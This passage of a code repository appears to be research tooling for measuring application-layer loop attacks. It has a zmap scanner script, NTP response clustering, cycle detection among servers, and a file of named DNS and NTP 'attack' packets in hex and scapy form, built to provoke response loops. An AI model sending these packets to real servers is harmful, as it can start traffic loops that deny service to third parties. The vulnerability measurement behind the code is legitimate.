7 | 8 | if len(sys.argv)!=4: 9 | print('python3 draw_directed_graph.py ') 10 | 11 | loop_probe_table = sys.argv[1] 12 | loop_probe_cluster_table = sys.argv[2] 13 | ip_pair_file = sys.argv[3] 14 | 15 | 16 | 17 | def simple_cycles(G, limit): 18 | # code from stack_overflow, we are using an outdated networkx (Debian doens't have the latest version) 19 | # https://stackoverflow.com/questions/46590502/how-to-modify-johnsons-elementary-cycles-algorithm-to-cap-maximum-cycle-length 20 | subG = type(G)(G.edges()) 21 | sccs = list(nx.strongly_connected_components(subG)) 22 | while sccs: 23 | scc = sccs.pop() 24 | startnode = scc.pop() 25 | path = [startnode] 26 | blocked = set() 27 | blocked.add(startnode) 28 | stack = [(startnode, list(subG[startnode]))] 29 | 30 | while stack: 31 | thisnode, nbrs = stack[-1] 32 | 33 | if nbrs and len(path) < limit: 34 | nextnode = nbrs.pop() 35 | if nextnode == startnode: 36 | yield path[:] 37 | elif nextnode not in blocked: 38 | path.append(nextnode) 39 | stack.append((nextnode, list(subG[nextnode]))) 40 | blocked.add(nextnode) 41 | continue 42 | if not nbrs or len(path) >= limit: 43 | blocked.remove(thisnode) 44 | stack.pop() 45 | path.pop() 46 | subG.remove_node(startnode) 47 | H = subG.subgraph(scc) 48 | sccs.extend(list(nx.strongly_connected_components(H))) 49 | 50 | def get_edge_info(scan_2nd_table_name,cluster_table_name): 51 | db_name = "loop_scan" 52 | db_conn = psycopg2.connect(database=db_name, user="scan") 53 | db_conn.autocommit = True 54 | cursor = db_conn.cursor() 55 | 56 | select_command = "SELECT attack_name as input_id, type_id as output_id,IP_list,ARRAY_LENGTH(IP_list,1) \ 57 | FROM (SELECT attack_name,type_id,ARRAY_AGG(DISTINCT rsp_src_ip) as IP_list\ 58 | FROM (SELECT attack_name, rsp_src_ip, type_id FROM %s\ 59 | JOIN %s ON payload=rsp_payload) AS temp GROUP BY attack_name,type_id)\ 60 | AS TEMP2 ORDER bY ARRAY_LENGTH(IP_list,1) DESC;" % (scan_2nd_table_name,cluster_table_name) 61 | 62 | 63 | cursor.execute(select_command) 64 | data = cursor.fetchall() 65 | 66 | 67 | 68 | 69 | edges = [] 70 | edges_attr = {} 71 | for item in data: 72 | edges.append((int(item[0]),int(item[1]))) 73 | edges_attr[str(item[0]) + ":" + str(item[1])] = (item[2],len(item[2])) 74 | 75 | return edges,edges_attr 76 | 77 | 78 | def build_directed_graph(nodes,edges): 79 | G = nx.DiGraph() 80 | G.add_nodes_from(nodes) 81 | G.add_edges_from(edges) 82 | return G 83 | 84 | 85 | 86 | def get_from_edges_attr(edges_attr,start,end): 87 | return edges_attr[str(start)+':'+str(end)] 88 | 89 | def simplify_graph(graph,edges_attr): 90 | simplified_nodes = set() 91 | simplified_edges = set() 92 | all_ips_affected = set() 93 | cycle_ip_dict = {} 94 | 95 | nx.simple_cycles = simple_cycles 96 | cycles = nx.simple_cycles(graph,5) 97 | 98 | table_headers = ['cycle','number of involved IPs','min edge IP amount','min edge','number of pairs'] 99 | print_lines = [] 100 | 101 | 102 | for cycle in cycles: 103 | 104 | if len(cycle)==1: 105 | simplified_nodes.add(cycle[0]) 106 | simplified_edges.add((cycle[0],cycle[0])) 107 | edge_attr = get_from_edges_attr(edges_attr,cycle[0],cycle[0]) 108 | if edge_attr[1]<100: 109 | continue 110 | cycle.append(cycle[0]) 111 | print_lines.append([cycle,edge_attr[1],edge_attr[1],[cycle[0],cycle[0]],int(math.factorial(edge_attr[1])/(2*math.factorial(edge_attr[1]-2)))]) 112 | 113 | all_ips_affected.update(edge_attr[0]) 114 | cycle_ip_dict[str(cycle)] = (edge_attr[0],edge_attr[0]) 115 | 116 | 117 | elif len(cycle)==2: 118 | simplified_nodes.add(cycle[0]) 119 | simplified_nodes.add(cycle[1]) 120 | simplified_edges.add((cycle[0],cycle[1])) 121 | simplified_edges.add((cycle[1],cycle[0])) 122 | edge_A_attr = get_from_edges_attr(edges_attr,cycle[0],cycle[1]) 123 | edge_B_attr = get_from_edges_attr(edges_attr,cycle[1],cycle[0]) 124 | if edge_A_attr[1]<100 or edge_B_attr[1]<100: 125 | continue 126 | cycle.append(cycle[0]) 127 | affected_IPs = set(edge_A_attr[0]) 128 | affected_IPs.update(edge_B_attr[0]) 129 | if edge_A_attr[1]<=edge_B_attr[1]: 130 | print_lines.append([cycle,len(affected_IPs),min(edge_A_attr[1],edge_B_attr[1]),[cycle[0],cycle[1]],edge_A_attr[1]*edge_B_attr[1]-len(set(edge_A_attr[0]).intersection(set(edge_B_attr[0])))*len(set(edge_A_attr[0]).intersection(set(edge_B_attr[0])))]) 131 | else: 132 | print_lines.append([cycle,len(affected_IPs),min(edge_A_attr[1],edge_B_attr[1]),[cycle[1],cycle[0]],edge_A_attr[1]*edge_B_attr[1]-len(set(edge_A_attr[0]).intersection(set(edge_B_attr[0])))*len(set(edge_A_attr[0]).intersection(set(edge_B_attr[0])))]) 133 | 134 | all_ips_affected.update(affected_IPs) 135 | cycle_ip_dict[str(cycle)] = (edge_A_attr[0],edge_B_attr[0]) 136 | 137 | else: 138 | temp_edge_list_A = set() 139 | temp_edge_list_B = set() 140 | cycle.append(cycle[0]) 141 | min_number = 0 142 | min_edge = None 143 | 144 | try: 145 | for i in range(0,len(cycle)): 146 | if i==len(cycle)-1: 147 | break 148 | if i==0: 149 | edge_attr = get_from_edges_attr(edges_attr,cycle[i],cycle[i+1]) 150 | temp_edge_list_A.update(edge_attr[0]) 151 | min_number = edge_attr[1] 152 | min_edge=[cycle[i],cycle[i+1]] 153 | elif i==1: 154 | edge_attr = get_from_edges_attr(edges_attr,cycle[i],cycle[i+1]) 155 | temp_edge_list_B.update(edge_attr[0]) 156 | if edge_attr[1] num_allowed_ips): 33 | num_probes = num_allowed_ips 34 | if DEBUG: logging.debug("FINISHED: counting lines in allowlist.\n") 35 | 36 | responses_storage_name = proto + "_target_" + attack_pkts_proto + "_pkts__rsps__" + str(num_probes) + "_probed_" + trunc_timestamp 37 | 38 | 39 | create_new_table_sql = "CREATE TABLE IF NOT EXISTS " + responses_storage_name + "(saddr inet NOT NULL,\ 40 | data text NOT NULL, attack_name text NOT NULL, index text NOT NULL);" 41 | if DEBUG: logging.debug("START: creating sql responses table.") 42 | db_cursor.execute(create_new_table_sql) 43 | if DEBUG: logging.debug("FINISHED: creating sql responses table.\n") 44 | 45 | f = open(attack_pkts_proto + '_payload.pkl','rb') 46 | attacks = pickle.load(f) 47 | 48 | sending_port = 50000 49 | 50 | for attack_name in attacks: 51 | attack_pkts = attacks[attack_name] 52 | 53 | for index in range(0, len(attack_pkts)): 54 | attack_pkt = attack_pkts[index] 55 | if DEBUG: logging.debug("---------- PROBE: " + attack_name + " ----------\n") 56 | sending_port += 1 57 | 58 | # the server might deploy source port filtering -> to filter out well-known port number 59 | # if you want to get rid of these cases, uncomment the following code 60 | # proto_to_port = { "dns" : 53, "ntp" : 123, "tftp" : 69 } 61 | # target_port = proto_to_port[proto] 62 | # sending_port = proto_to_port[proto] 63 | 64 | 65 | # one could use the following output filter: 66 | # --output-fields=\"saddr,sport,dport,data\" \\\n\ 67 | # --output-filter=\"sport=" + str(proto_to_port[proto]) + " && dport=" + str(sending_port) + " && success=1 && repeat=0\" \\\n\ 68 | # In case some UDP server (e.g., TFTP server) will use random port to send response. 69 | 70 | # ----------------------- PROBE IPS W/ ATTACK PACKET ----------------------- 71 | scan_script_str = "#!/usr/bin/env bash\n\ 72 | WHITELIST=allowlist_" + proto + ".txt\n\ 73 | BLACKLIST=blacklist.txt\n\ 74 | box_config=box.config\n\ 75 | responses_dir_path=rsps/" + responses_storage_name + "\n\ 76 | mkdir -p $responses_dir_path\n\ 77 | set -o pipefail &&\n\ 78 | /usr/local/sbin/zmap \\\n\ 79 | --config=$box_config \\\n\ 80 | --target-port=" + str(target_port) + " \\\n\ 81 | --source-port=" + str(sending_port) + " \\\n\ 82 | --allowlist-file=${WHITELIST} \\\n\ 83 | --blocklist-file=${BLACKLIST} \\\n\ 84 | --rate=100000 \\\n\ 85 | --sender-threads=1 \\\n\ 86 | --max-targets=" + str(num_probes) + " \\\n\ 87 | --cooldown-time=10 \\\n\ 88 | --seed=85 \\\n\ 89 | --probes=1 \\\n\ 90 | --probe-module=udp \\\n\ 91 | --probe-args=hex:" + attack_pkt.strip() + " \\\n\ 92 | --output-module=csv \\\n\ 93 | --output-fields=\"saddr,data\" \\\n\ 94 | --output-filter=\"\" \\\n\ 95 | --verbosity=0 \\\n\ 96 | --quiet \\\n\ 97 | --disable-syslog \\\n\ 98 | --ignore-blocklist-errors \\\n\ 99 | > ${responses_dir_path}/" + attack_name + "_responses.csv" 100 | 101 | if DEBUG: logging.debug("START: write zmap script to .sh file.") 102 | scan_script_f = open("zmap_scan.sh", "w") 103 | scan_script_f.write(scan_script_str) 104 | scan_script_f.close() 105 | if DEBUG: logging.debug("FINISHED: write zmap script to .sh file.\n") 106 | 107 | if DEBUG: logging.debug("START: call zmap on a single attack packet.") 108 | call(['/bin/bash', 'zmap_scan.sh']) 109 | if DEBUG: logging.debug("FINISHED: call zmap on a single attack packet.\n") 110 | 111 | time.sleep(5) 112 | 113 | # ---------------------------- SAVE RESPONSES ---------------------------------- 114 | 115 | if DEBUG: logging.debug("START: read csv into pandas dataframe.") 116 | csv_path = os.getcwd() + "/rsps/" + responses_storage_name + "/" + attack_name + "_responses.csv" 117 | zmap_df = pd.read_csv(csv_path) 118 | 119 | if DEBUG: logging.debug("FINISHED: read csv into pandas dataframe.") 120 | zmap_df['attack_name'] = attack_name 121 | zmap_df['index'] = str(index) 122 | # zmap_df = zmap_df.drop(['sport','dport'],axis=1) 123 | if DEBUG: logging.debug("FINISHED: add attack column to csv.") 124 | zmap_df.to_csv(csv_path, index=False) 125 | if DEBUG: logging.debug("FINISHED: convert dataframe back to csv.\n") 126 | 127 | transfer_sql = "COPY " + responses_storage_name + "(saddr, data, attack_name, index) FROM '" + csv_path + "' DELIMITER ',' CSV HEADER WHERE data IS NOT NULL;" 128 | if DEBUG: logging.debug("START: copy csv to database.") 129 | db_cursor.execute(transfer_sql) 130 | if DEBUG: logging.debug("FINISHED: copy csv to database.\n") 131 | 132 | 133 | if DEBUG: logging.debug("START: rename two columns in database.") 134 | rename_col1_sql = "ALTER TABLE " + responses_storage_name + " RENAME saddr TO rsp_src_ip;" 135 | db_cursor.execute(rename_col1_sql) 136 | 137 | rename_col2_sql = "ALTER TABLE " + responses_storage_name + " RENAME data TO rsp_payload;" 138 | db_cursor.execute(rename_col2_sql) 139 | if DEBUG: logging.debug("FINISHED: rename two columns in database.\n") 140 | 141 | if DEBUG: logging.debug("START: close database cursor and connection.") 142 | db_cursor.close() 143 | db_conn.close() 144 | if DEBUG: logging.debug("FINISHED: close database cursor and connection.\n") 145 | 146 | print("Probe responses were stored using Postgresql.") 147 | print("\tdatabase name: " + db_name) 148 | print("\ttable name: " + responses_storage_name) -------------------------------------------------------------------------------- /ntp_clustering.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | import psycopg2 3 | import pickle 4 | import psycopg2.extras 5 | 6 | 7 | def NTP_classifier(payload): 8 | try: 9 | status_bit = '' 10 | status_code = '' 11 | packet = NTPHeader(bytes.fromhex(payload)) 12 | 13 | mode = str(packet.mode) 14 | status_bit = status_bit + mode 15 | status_code = status_code + status_bit 16 | 17 | if status_bit=='6': 18 | try: 19 | packet = NTPControl(bytes.fromhex(payload)) 20 | try: 21 | status_bit = str(packet.zeros).zfill(2) 22 | except: 23 | status_bit = '--' 24 | status_code = status_code + status_bit 25 | 26 | try: 27 | status_bit = str(packet.version).zfill(2) 28 | except: 29 | status_bit = '--' 30 | status_code = status_code + status_bit 31 | 32 | try: 33 | status_bit = str(packet.response).zfill(2) 34 | except: 35 | status_bit = '--' 36 | status_code = status_code + status_bit 37 | 38 | try: 39 | status_bit = str(packet.err).zfill(2) 40 | except: 41 | status_bit = '--' 42 | status_code = status_code + status_bit 43 | 44 | try: 45 | status_bit = str(packet.more).zfill(2) 46 | except: 47 | status_bit = '--' 48 | status_code = status_code + status_bit 49 | 50 | try: 51 | status_bit = str(packet.opcode).zfill(2) 52 | except: 53 | status_bit = '--' 54 | status_code = status_code + status_bit 55 | 56 | try: 57 | status_bit = str(packet.status_word) 58 | except: 59 | status_bit = 'cn' 60 | status_code = status_code + status_bit 61 | 62 | 63 | try: 64 | status_bit = str(packet.status).zfill(4) 65 | except: 66 | status_bit = '----' 67 | status_code = status_code + status_bit 68 | 69 | 70 | try: 71 | if packet.authenticator != '': 72 | status_bit = 'yy' 73 | else: 74 | status_bit = 'nn' 75 | 76 | except: 77 | status_bit = 'cn' 78 | status_code = status_code + status_bit 79 | except Exception as e: 80 | status_code = status_code + str(e) 81 | 82 | # elif status_bit=='7': 83 | # try: 84 | # packet = NTPPrivate(bytes.fromhex(payload)) 85 | # try: 86 | # status_bit = str(packet.response).zfill(2) 87 | # except: 88 | # status_bit = '--' 89 | # status_code = status_code + status_bit 90 | 91 | 92 | # try: 93 | # status_bit = str(packet.version).zfill(2) 94 | # except: 95 | # status_bit = '--' 96 | # status_code = status_code + status_bit 97 | 98 | # try: 99 | # status_bit = str(packet.implementation).zfill(4) 100 | # except: 101 | # status_bit = '----' 102 | # status_code = status_code + status_bit 103 | 104 | # try: 105 | # status_bit = str(packet.err).zfill(4) 106 | # except: 107 | # status_bit = '----' 108 | # status_code = status_code + status_bit 109 | 110 | # try: 111 | # status_bit = str(packet.request_code).zfill(4) 112 | # except: 113 | # status_bit = '----' 114 | # status_code = status_code + status_bit 115 | 116 | # except Exception as e: 117 | # status_code = status_code + str(e) 118 | else: 119 | try: 120 | status_bit = str(packet.leap).zfill(2) 121 | except: 122 | status_bit = '--' 123 | status_code = status_code + status_bit 124 | 125 | try: 126 | status_bit = str(packet.version).zfill(2) 127 | except: 128 | status_bit = '--' 129 | status_code = status_code + status_bit 130 | 131 | try: 132 | status_bit = str(packet.stratum).zfill(4) 133 | except: 134 | status_bit = '----' 135 | status_code = status_code + status_bit 136 | 137 | try: 138 | status_bit = str(packet.poll).zfill(4) 139 | except: 140 | status_bit = '----' 141 | status_code = status_code + status_bit 142 | 143 | 144 | # try: 145 | # status_bit = str(packet.ref_id) 146 | # except: 147 | # status_bit = '----' 148 | # status_code = status_code + status_bit 149 | 150 | 151 | return status_code 152 | 153 | except Exception as e: 154 | status_code = str(e) 155 | return status_code 156 | 157 | 158 | def do_cluster(raw_data_table_name,output_mapping_table_name,cluster_payload_pattern_mapping): 159 | db_name = "loop_scan" 160 | db_conn = psycopg2.connect(database=db_name, user="scan") 161 | db_conn.autocommit = True 162 | cursor = db_conn.cursor() 163 | 164 | sql_get_length = "SELECT COUNT(*) FROM %s;" % (raw_data_table_name) 165 | cursor.execute(sql_get_length) 166 | max_item_count = cursor.fetchall()[0][0] 167 | 168 | 169 | status_dict = {} 170 | total_cluster = 0 171 | try: 172 | dict_file = open(cluster_payload_pattern_mapping,'rb') 173 | status_dict = pickle.load(dict_file) 174 | total_clusters = len(status_dict) 175 | dict_file.close() 176 | except: 177 | pass 178 | 179 | 180 | offset = 0 181 | step_size = 10000 182 | progress_count = 0 183 | 184 | 185 | try: 186 | drop_table = "DROP TABLE %s;" % (output_mapping_table_name) 187 | cursor.execute(drop_table) 188 | except: 189 | pass 190 | 191 | create_table = "CREATE TABLE %s (type_id INT,\ 192 | payload TEXT PRIMARY KEY);" % (output_mapping_table_name) 193 | cursor.execute(create_table) 194 | 195 | 196 | insert_command = "INSERT INTO " + output_mapping_table_name + " VALUES %s;" 197 | payload_list = set() 198 | while(True): 199 | if offset > max_item_count: 200 | break 201 | 202 | select_command = "select DISTINCT rsp_payload from %s;" % (raw_data_table_name) 203 | cursor.execute(select_command) 204 | all_data = cursor.fetchall() 205 | 206 | update_list = [] 207 | for data in all_data: 208 | progress_count = progress_count + 1 209 | payload_data = data[0].strip() 210 | total_clusters = len(status_dict.keys()) + 1 211 | status_code = NTP_classifier(payload_data) 212 | if len(payload_data) > 2500: 213 | continue 214 | if not status_code in status_dict: 215 | status_dict[status_code] = total_clusters 216 | 217 | update_list.append((status_dict[status_code],payload_data,)) 218 | 219 | temp = psycopg2.extras.execute_values(cursor,insert_command,update_list) 220 | 221 | offset = offset + step_size 222 | break 223 | 224 | 225 | with open(cluster_payload_pattern_mapping,'wb') as f: 226 | pickle.dump(status_dict,f) 227 | f.close() 228 | 229 | 230 | import sys 231 | 232 | if len(sys.argv)!=4: 233 | print('python3 ntp_clustering.py ') 234 | exit(-1) 235 | 236 | scan_table_name = sys.argv[1] 237 | cluster_table_name = sys.argv[2] 238 | type_summary_id_mapping_dict = sys.argv[3] 239 | do_cluster(scan_table_name,cluster_table_name,type_summary_id_mapping_dict) 240 | -------------------------------------------------------------------------------- /proto_attack_profiles.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | 3 | TEXT = "text" 4 | HEX = "hex" 5 | 6 | def to_hex(pkt): 7 | pkt = linehexdump(pkt, dump=True) 8 | pkt = pkt[:pkt.find(" ")] 9 | pkt = pkt.replace(" ", "") 10 | return pkt 11 | 12 | class Chargen_Attack_Profile: 13 | def __init__(self): 14 | self.port = 19 15 | self.attack_name_to_pkt = {} 16 | self.attack_name_to_format = {} 17 | self.attack_name_to_pkt["random"] = "a" 18 | self.attack_name_to_format["random"] = TEXT 19 | 20 | class Qotd_Attack_Profile: 21 | def __init__(self): 22 | self.port = 17 23 | self.attack_name_to_pkt = {} 24 | self.attack_name_to_format = {} 25 | self.attack_name_to_pkt["random"] = "a" 26 | self.attack_name_to_format["random"] = TEXT 27 | 28 | class Echo_Attack_Profile: 29 | def __init__(self): 30 | self.port = 7 31 | self.attack_name_to_pkt = {} 32 | self.attack_name_to_format = {} 33 | self.attack_name_to_pkt["random"] = "a" 34 | self.attack_name_to_format["random"] = TEXT 35 | 36 | class Daytime_Attack_Profile: 37 | def __init__(self): 38 | self.port=13 39 | self.attack_name_to_pkt = {} 40 | self.attack_name_to_format = {} 41 | 42 | self.attack_name_to_pkt['noempty'] = 'a' 43 | self.attack_name_to_format['noempty'] = TEXT 44 | 45 | class Time_Attack_Profile: 46 | def __init__(self): 47 | self.port=37 48 | self.attack_name_to_pkt = {} 49 | self.attack_name_to_format = {} 50 | 51 | self.attack_name_to_pkt['noempty'] = 'a' 52 | self.attack_name_to_format['noempty'] = TEXT 53 | 54 | class Auser_Attack_Profile: 55 | def __init__(self): 56 | self.port=11 57 | self.attack_name_to_pkt = {} 58 | self.attack_name_to_format = {} 59 | 60 | self.attack_name_to_pkt['noempty'] = 'a' 61 | self.attack_name_to_format['noempty'] = TEXT 62 | 63 | class DNS_Attack_Profile: 64 | def __init__(self): 65 | self.port = 53 # Port corresponding to the protocol. 66 | 67 | self.attack_name_to_pkt = {} # Stores the attack packets that can be 68 | # sent to create a loop attack by 69 | # abusing dns protocol implementations. 70 | self.attack_name_to_format = {} # Maps each attack in 71 | # 'attack_name_to_pkt' to the packet's 72 | # format (format options in 73 | # class Attack_Pkt_Format()). 74 | 75 | 76 | # ----------------------- Query Based ---------------------------------- 77 | 78 | self.attack_name_to_pkt["test1"] = "860c010000010000000000000a6f757220646f6d61696e0000010001" 79 | self.attack_name_to_format["test1"] = HEX 80 | 81 | self.attack_name_to_pkt["test2"] = "a745008000010000000000000a6f757220646f6d61696e0000010001" 82 | self.attack_name_to_format["test2"] = HEX 83 | 84 | self.attack_name_to_pkt["bad_req_hdr1"] = "000001000001000000000000" 85 | self.attack_name_to_format["bad_req_hdr1"] = HEX 86 | 87 | self.attack_name_to_pkt["bad_req_hdr2"] = "06361706026465000001" 88 | self.attack_name_to_format["bad_req_hdr2"] = HEX 89 | 90 | self.attack_name_to_pkt["bad_req_hdr3"] = "b0b506b3b6c973701d6102c6465f00001c0001" 91 | self.attack_name_to_format["bad_req_hdr3"] = HEX 92 | 93 | self.attack_name_to_pkt["bad_req_hdr4"] = "fb6c6072b9037469612a2ddd6f73536f372264650000410001" 94 | self.attack_name_to_format["bad_req_hdr4"] = HEX 95 | 96 | self.attack_name_to_pkt["bad_req_hdr5"] = "860c610000010000000000000a6f757220646f6d61696e0000010001" 97 | self.attack_name_to_format["bad_req_hdr5"] = HEX 98 | 99 | 100 | self.attack_name_to_pkt["bad_req_qr1"] = "0000010000010000000000000a6f757220646f6d61696e0001180118" 101 | self.attack_name_to_format["bad_req_qr1"] = HEX 102 | 103 | self.attack_name_to_pkt["bad_req_qr2"] = to_hex(DNS(qd=DNSQR(qname='m', qtype=280, qclass=280))) 104 | self.attack_name_to_format["bad_req_qr2"] = HEX 105 | 106 | 107 | # ------------------------ Response Based---- ------------------------ 108 | self.attack_name_to_pkt["good_rsp"] = "0000818000010001000000000a6f757220646f6d61696e00000100010a6f757220646f6d61696e00000100010000003c000401020304" 109 | self.attack_name_to_format["good_rsp"] = HEX 110 | 111 | self.attack_name_to_pkt["bad_rsp_hdr1"] = "7b0a818000010000000000000a6f757220646f6d61696e00000100010a6f757220646f6d61696e00000100010000003c000401020304" 112 | self.attack_name_to_format["bad_rsp_hdr1"] = HEX 113 | 114 | self.attack_name_to_pkt["bad_rsp_hdr2"] = "00b5a44818010001c030a00f23789000b1001c006f757220646f6d61696e2e00001c0001c00c00060001000000f50038036e732e0078957d1500002a3000000e1000093a8000007080" 115 | self.attack_name_to_format["bad_rsp_hdr2"] = HEX 116 | 117 | self.attack_name_to_pkt["bad_rsp_hdr3"] = "9309c18000010001000000000a6f757220646f6d61696e00000100010a6f757220646f6d61696e00000100010000003c000401020304" 118 | self.attack_name_to_format["bad_rsp_hdr3"] = HEX 119 | 120 | self.attack_name_to_pkt["bad_rsp_hdr4"] = "0000818f00010001000000000a6f757220646f6d61696e00000100010a6f757220646f6d61696e00000100010000003c000401020304" 121 | self.attack_name_to_format["bad_rsp_hdr4"] = HEX 122 | 123 | 124 | self.attack_name_to_pkt["bad_rsp_hdr5"] = "a745010000010001000000000a6f757220646f6d61696e00000100010a6f757220646f6d61696e0000010001000100b1000401020304" 125 | self.attack_name_to_format["bad_rsp_hdr5"] = HEX 126 | 127 | self.attack_name_to_pkt["bad_rsp_rr1"] = to_hex(DNS(qd=DNSRR(type=280, rclass=280))) 128 | self.attack_name_to_format["bad_rsp_rr1"] = HEX 129 | 130 | self.attack_name_to_pkt["bad_rsp_rr2"] = to_hex(DNS(qd=DNSRR(rrname='m', type=280, rclass=280))) 131 | self.attack_name_to_format["bad_rsp_rr2"] = HEX 132 | 133 | 134 | self.attack_name_to_pkt["bad_rsp_hdr_rr1"] = "a74581800001000100000000c00c00010001000100b10004d415a572" 135 | self.attack_name_to_format["bad_rsp_hdr_rr1"] = HEX 136 | 137 | self.attack_name_to_pkt["bad_rsp_hdr_rr2"] = "a74581800000000100000000046f757220646f6d61696e0000010001c00c00010001000100b10004d415a572" 138 | self.attack_name_to_format["bad_rsp_hdr_rr2"] = HEX 139 | 140 | self.attack_name_to_pkt["bad_rsp_hdr_rr3"] = "75a223cf47d3f2c40b889c" + to_hex(DNSRR(rrname='m', type=280, rclass=280)) 141 | self.attack_name_to_format["bad_rsp_hdr_rr3"] = HEX 142 | 143 | 144 | # ---------------------------- ERRORS ---------------------------------- 145 | self.attack_name_to_pkt["err1"] = "6974818100010000000000000a6f757220646f6d61696e0000010001" 146 | self.attack_name_to_format["err1"] = HEX 147 | 148 | self.attack_name_to_pkt["err2"] = "7d9a818200010000000000000a6f757220646f6d61696e0000410001" 149 | self.attack_name_to_format["err2"] = HEX 150 | 151 | self.attack_name_to_pkt["err3"] = "6974818300010000000000000a6f757220646f6d61696e0000010001" 152 | self.attack_name_to_format["err3"] = HEX 153 | 154 | self.attack_name_to_pkt["err4"] = "6974818400010000000000000a6f757220646f6d61696e0000010001" 155 | self.attack_name_to_format["err4"] = HEX 156 | 157 | self.attack_name_to_pkt["err5"] = "6974818500010000000000000a6f757220646f6d61696e0000010001" 158 | self.attack_name_to_format["err5"] = HEX 159 | 160 | class NTP_Attack_Profile: 161 | def __init__(self): 162 | self.port = 123 163 | 164 | self.attack_name_to_pkt = {} # Stores the attack packets that can be 165 | # sent to create a loop attack by 166 | # abusing protocol implementations. 167 | self.attack_name_to_format = {} # Maps each attack in 168 | # 'attack_name_to_pkt' to the packet's 169 | # format (format options are constants 170 | # at the top of this file). 171 | 172 | # ------------------ Server Mode ----------------------------------------- 173 | self.attack_name_to_pkt["stratum1"] = to_hex(NTPHeader(mode=4, stratum=14)) 174 | self.attack_name_to_format["stratum1"] = HEX 175 | 176 | self.attack_name_to_pkt["stratum2"] = to_hex(NTPHeader(mode=4, stratum=15)) 177 | self.attack_name_to_format["stratum2"] = HEX 178 | 179 | self.attack_name_to_pkt["stratum3"] = to_hex(NTPHeader(mode=4, stratum=16)) 180 | self.attack_name_to_format["stratum3"] = HEX 181 | 182 | self.attack_name_to_pkt["kiss_xxxx_s"] = to_hex(NTPHeader(mode=4, stratum=0, ref_id="XXXX")) 183 | self.attack_name_to_format["kiss_xxxx_s"] = HEX 184 | 185 | self.attack_name_to_pkt["kiss_abcd_s"] = to_hex(NTPHeader(mode=4, stratum=0, ref_id="ABCD")) 186 | self.attack_name_to_format["kiss_abcd_s"] = HEX 187 | 188 | 189 | # -------------------- broadcast ----------------------------------------- 190 | self.attack_name_to_pkt["bcast"] = to_hex(NTPHeader(mode=5)) 191 | self.attack_name_to_format["bcast"] = HEX 192 | 193 | 194 | # -------------------- Control message ----------------------------------- 195 | 196 | self.attack_name_to_pkt["cntrl_zer"] = to_hex(NTPControl(zeros=1)) 197 | self.attack_name_to_format["cntrl_zer"] = HEX 198 | 199 | self.attack_name_to_pkt["cntrl_err1"] = to_hex(NTPControl(err=1, response=1)) 200 | self.attack_name_to_format["cntrl_err1"] = HEX 201 | 202 | self.attack_name_to_pkt["cntrl_err2"] = to_hex(NTPControl(err=1)) 203 | self.attack_name_to_format["cntrl_err2"] = HEX 204 | 205 | self.attack_name_to_pkt["cntrl_opcode1"] = to_hex(NTPControl(op_code=31)) 206 | self.attack_name_to_format["cntrl_opcode1"] = HEX 207 | 208 | self.attack_name_to_pkt["cntrl_opcode2"] = to_hex(NTPControl(op_code=31, data="iyQo7zCkRZOuGqu")) 209 | self.attack_name_to_format["cntrl_opcode2"] = HEX 210 | 211 | self.attack_name_to_pkt["cntrl_opcode3"] = to_hex(NTPControl(op_code=5, data="iyQo7zCkRZOuGqu")) 212 | self.attack_name_to_format["cntrl_opcode3"] = HEX 213 | 214 | self.attack_name_to_pkt["cntrl_opcode4"] = to_hex(NTPControl(op_code=7, data="iyQo7zCkRZOuGqu")) 215 | self.attack_name_to_format["cntrl_opcode4"] = HEX 216 | 217 | self.attack_name_to_pkt["cntrl_opcode5"] = to_hex(NTPControl(response=1, op_code=7)) 218 | self.attack_name_to_format["cntrl_opcode5"] = HEX 219 | 220 | self.attack_name_to_pkt["cntrl_sys_stat"] = to_hex(NTPControl(err=1, response=1, status_word=NTPSystemStatusPacket(system_event_code=7))) 221 | self.attack_name_to_format["cntrl_sys_stat"] = HEX 222 | 223 | self.attack_name_to_pkt["cntrl_err_stat1"] = to_hex(NTPControl(err=1, response=1, status_word=NTPErrorStatusPacket(error_code=1))) 224 | self.attack_name_to_pkt["cntrl_err_stat2"] = to_hex(NTPControl(err=1, response=1, status_word=NTPErrorStatusPacket(error_code=2))) 225 | self.attack_name_to_pkt["cntrl_err_stat3"] = to_hex(NTPControl(err=1, response=1, status_word=NTPErrorStatusPacket(error_code=3))) 226 | self.attack_name_to_pkt["cntrl_err_stat4"] = to_hex(NTPControl(err=1, response=1, status_word=NTPErrorStatusPacket(error_code=4))) 227 | self.attack_name_to_pkt["cntrl_err_stat5"] = to_hex(NTPControl(err=1, response=1, status_word=NTPErrorStatusPacket(error_code=5))) 228 | self.attack_name_to_pkt["cntrl_err_stat6"] = to_hex(NTPControl(err=1, response=1, status_word=NTPErrorStatusPacket(error_code=6))) 229 | self.attack_name_to_pkt["cntrl_err_stat7"] = to_hex(NTPControl(err=1, response=1, status_word=NTPErrorStatusPacket(error_code=7))) 230 | self.attack_name_to_pkt["cntrl_err_stat8"] = to_hex(NTPControl(err=1, response=1, status_word=NTPErrorStatusPacket(error_code=200))) 231 | 232 | self.attack_name_to_format["cntrl_err_stat1"] = HEX 233 | self.attack_name_to_format["cntrl_err_stat2"] = HEX 234 | self.attack_name_to_format["cntrl_err_stat3"] = HEX 235 | self.attack_name_to_format["cntrl_err_stat4"] = HEX 236 | self.attack_name_to_format["cntrl_err_stat5"] = HEX 237 | self.attack_name_to_format["cntrl_err_stat6"] = HEX 238 | self.attack_name_to_format["cntrl_err_stat7"] = HEX 239 | self.attack_name_to_format["cntrl_err_stat8"] = HEX 240 | 241 | self.attack_name_to_pkt["cntrl_clock_stat1"] = to_hex(NTPControl(err=1, response=1, status_word=NTPClockStatusPacket(clock_status=149, code=5))) 242 | self.attack_name_to_format["cntrl_clock_stat1"] = HEX 243 | 244 | self.attack_name_to_pkt["cntrl_clock_stat2"] = to_hex(NTPControl(err=1, response=1, status_word=NTPClockStatusPacket(clock_status=5))) 245 | self.attack_name_to_format["cntrl_clock_stat2"] = HEX 246 | 247 | self.attack_name_to_pkt["cntrl_peer_stat1"] = to_hex(NTPControl(err=1, response=1, status_word=NTPPeerStatusPacket(peer_sel=0, peer_event_code=2))) 248 | self.attack_name_to_format["cntrl_peer_stat1"] = HEX 249 | 250 | 251 | 252 | # -------------------- Private reserved ----------------------------------- 253 | 254 | self.attack_name_to_pkt["bad5_rsvd"] = "270206000000007f00000100000000e8622e8655e0000000000000000000e8622e86696000" 255 | self.attack_name_to_format["bad5_rsvd"] = HEX 256 | 257 | self.attack_name_to_pkt["bad2_rsvd"] = 